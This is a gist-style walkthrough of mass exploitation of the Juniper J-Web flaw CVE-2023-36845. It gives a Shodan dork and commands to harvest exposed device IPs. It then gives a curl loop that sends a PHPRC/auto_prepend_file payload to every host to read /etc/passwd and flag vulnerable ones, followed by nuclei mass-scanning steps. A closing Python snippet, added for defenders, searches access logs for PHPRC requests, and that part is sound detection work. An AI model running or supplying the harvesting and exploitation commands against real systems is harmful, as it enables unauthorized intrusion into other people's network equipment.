Created October 1, 2023 03:38
CVE-2023-36845
Hi Guys..
In this video, we will see mass exploitation of the Juniper Web Device Manager RCE vulnerability (CVE-2023-36845).
Description: A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environment variables to execute remote commands.
Shodan dork: title:"Juniper" http.favicon.hash:2141724739
Download the results using the command below (a Shodan Premium API key is needed):
shodan download --limit -1 juniper 'title:"Juniper" http.favicon.hash:2141724739'
I already downloaded the results using the shodan CLI command.
We will separate the IPs from the Shodan results. For this we will use the shodan parse command along with awk:
shodan parse juniper.json.gz --fields ip_str,port --separator " " | awk '{print $1}' | tee -a ip.txt
We will use the process below to automate the findings:
cat ip.txt| while read host do;do curl -sk "http://$host/?PHPRC=/dev/fd/0" -X POST -d 'auto_prepend_file="/etc/passwd"'| grep -i 'root:' && echo $host "is VULN";done
We can also use nuclei to do the mass scanning. Let's try nuclei first, as it's faster than the above one-liner.
cat ip.txt | httpx -silent | tee url.txt
cat url.txt | nuclei -t rce.yaml | tee output.txt
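
For defenders, the request shape used by the one-liner above (a request whose query string sets PHPRC) can be hunted for in access logs from a proxy or WAF in front of J-Web. This is an added example, not part of the original gist: the combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: Apache/Nginx "combined" style lines from a reverse proxy or WAF
# in front of J-Web; adapt the regex to your own log source.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Environment-variable style parameter name seen in the request on this page.
SUSPECT_PARAMS = {"PHPRC"}

def suspicious_params(target):
    """Return suspect query parameter NAMES in a request target.

    parse_qsl percent-decodes names, so encoded spellings such as
    %50HPRC are matched too; parameter values are deliberately ignored.
    """
    query = urlsplit(target).query
    names = {name for name, _ in parse_qsl(query, keep_blank_values=True)}
    return sorted(names & SUSPECT_PARAMS)

def scan(lines):
    """Yield (timestamp, source, method, status, params) for matching lines."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the assumed log format
        hits = suspicious_params(m["target"])
        if hits:
            yield (m["ts"], m["src"], m["method"], int(m["status"]), hits)

# Constructed sample log lines (documentation address ranges).
SAMPLE = [
    '198.51.100.7 - - [01/Oct/2023:03:40:11 +0000] "POST /?PHPRC=/dev/fd/0 HTTP/1.1" 200 1843 "-" "curl/8.1.2"',
    '198.51.100.7 - - [01/Oct/2023:03:40:12 +0000] "POST /?%50HPRC=%2Fdev%2Ffd%2F0 HTTP/1.1" 200 1843 "-" "curl/8.1.2"',
    '203.0.113.20 - - [01/Oct/2023:03:41:02 +0000] "GET /index.php?lang=en HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.21 - - [01/Oct/2023:03:42:30 +0000] "GET /docs?topic=PHPRC HTTP/1.1" 200 310 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ts, src, method, status, params in scan(SAMPLE):
        print(f"{ts} {src} {method} status={status} suspect_params={params}")
```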